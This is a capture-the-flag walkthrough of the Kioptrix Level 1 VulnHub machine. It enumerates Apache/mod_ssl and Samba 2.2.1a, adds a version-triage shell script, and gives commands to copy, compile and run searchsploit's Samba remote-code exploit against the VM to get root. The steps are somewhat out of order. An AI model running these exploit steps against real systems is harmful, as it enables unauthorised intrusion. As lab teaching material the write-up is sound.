This is my writeup for the Kioptrix Level 1 VM from vulnhub.com. It is rated easy. The objective is to get root access by any means possible, and there is more than one way to complete the challenge.
Let's start with an nmap_fast scan.
We now have a list of open ports. Browsing to the VM's IP on port 80 shows the default test page of the Apache web server.
Let's see what nikto finds on this web server.
The interesting finding is a buffer overflow in mod_ssl that may allow a remote shell:
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
Searching for "OSVDB-756" returns plenty of results about OpenFuck, an exploit for this mod_ssl bug, including a step-by-step guide for updating the old exploit so that it builds against current OpenSSL libraries. The download URL hard-coded in the exploit has to be changed as well.
The nmap scan also shows Samba listening on port 139.
Let's have a closer look:
Running enum4linux tells us that Samba 2.2.1a is installed:
[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
[+] Got OS info for 192.168.254.162 from srvinfo:
    KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
    platform_id     :       500
    os version      :       4.5
    server type     :       0x9a03
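With both version strings in hand (mod_ssl from nikto, Samba from enum4linux), it is worth checking that they actually fall inside the ranges the advisories cover before compiling anything. The POSIX shell script below is an added example, not part of the original writeup: it parses the two banner formats, compares dotted versions numerically (handling the letter suffix in 2.2.1a), and prints a verdict per service. The sample lines are constructed to mirror the nikto and enum4linux output formats rather than captured from the VM; the mod_ssl cut-off (2.8.7 and lower) is the one nikto reports, while the Samba cut-off (2.2.x below 2.2.8) is my assumption taken from the title searchsploit gives the exploit used later, not something the writeup states.

```shell
#!/bin/sh
# Added example: version triage for the nikto and enum4linux findings.
# Sample lines are CONSTRUCTED to mirror the tools' output, not captured from the VM.
SAMPLE_BANNER='Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b'
SAMPLE_SMB='[+] Got OS info for 192.168.254.162 from smbclient: Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]'

# version_le A B: exit 0 when dotted version A <= B, 1 otherwise.
# Components are compared numerically; a trailing letter (2.2.1a) is ignored
# for the comparison and missing components count as 0.
version_le() {
    a=$1; b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        ah=${a%%.*}; if [ "$ah" = "$a" ]; then a=''; else a=${a#*.}; fi
        bh=${b%%.*}; if [ "$bh" = "$b" ]; then b=''; else b=${b#*.}; fi
        an=$(printf '%s' "$ah" | sed 's/[^0-9].*//'); an=${an:-0}
        bn=$(printf '%s' "$bh" | sed 's/[^0-9].*//'); bn=${bn:-0}
        if [ "$an" -lt "$bn" ]; then return 0; fi
        if [ "$an" -gt "$bn" ]; then return 1; fi
    done
    return 0
}

# Extract the mod_ssl version from an Apache Server banner; prints nothing if absent.
modssl_version() {
    printf '%s\n' "$1" | sed -n 's/.*mod_ssl\/\([0-9][0-9.a-z]*\).*/\1/p'
}

# Extract the Samba version from an enum4linux "Server=[Samba x.y.z]" line.
samba_version() {
    printf '%s\n' "$1" | sed -n 's/.*Server=\[Samba \([0-9][0-9.a-z]*\)\].*/\1/p'
}

# nikto's range for OSVDB-756 / CVE-2002-0082: mod_ssl 2.8.7 and lower.
modssl_vulnerable() {
    v=$(modssl_version "$1")
    [ -n "$v" ] && version_le "$v" 2.8.7
}

# ASSUMED range for the Samba exploit used later (searchsploit's 10.c, titled
# "Samba < 2.2.8"): 2.2.0 <= version < 2.2.8. Not stated in the writeup itself.
samba_vulnerable() {
    v=$(samba_version "$1")
    [ -n "$v" ] && version_le 2.2.0 "$v" && ! version_le 2.2.8 "$v"
}

# Print a one-line verdict per service.
triage() {
    if modssl_vulnerable "$1"; then
        printf 'mod_ssl %s: within the OSVDB-756 range, OpenFuck is worth a try\n' "$(modssl_version "$1")"
    else
        printf 'mod_ssl: not found or outside the vulnerable range\n'
    fi
    if samba_vulnerable "$2"; then
        printf 'Samba %s: below 2.2.8, try searchsploit entry 10.c\n' "$(samba_version "$2")"
    else
        printf 'Samba: not found or outside the vulnerable range\n'
    fi
}

triage "$SAMPLE_BANNER" "$SAMPLE_SMB"
```

Feed it the real nikto Server line and the enum4linux smbclient line and it tells you which of the two paths is still open; a patched box (mod_ssl 2.8.16, Samba 3.x) is reported as out of range instead of sending you off to compile an exploit that cannot work.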
We use searchsploit to find exploits for this version.
$ searchsploit samba 2.2
After updating the exploit, we run it against our victim.
The flag is in one of root's mails:
$ mail
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <firstname.lastname@example.org>
To: email@example.com
Subject: About Level 2

If you are reading this, you got root.

Congratulations.
Level 2 won't be as easy...
To use the Samba RCE exploit found by searchsploit, first copy it to the working directory:
$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c
Next we compile it (gcc already marks the output executable, so the chmod is harmless but not needed):
$ gcc -o samba_exploit exploit.c
$ chmod +x samba_exploit
Then we run the exploit against our victim (-b selects the target platform; 0 is Linux):
$ ./samba_exploit -b 0 __IP__
Kioptrix: Level 1 is a good first step into scanning and running prewritten exploits.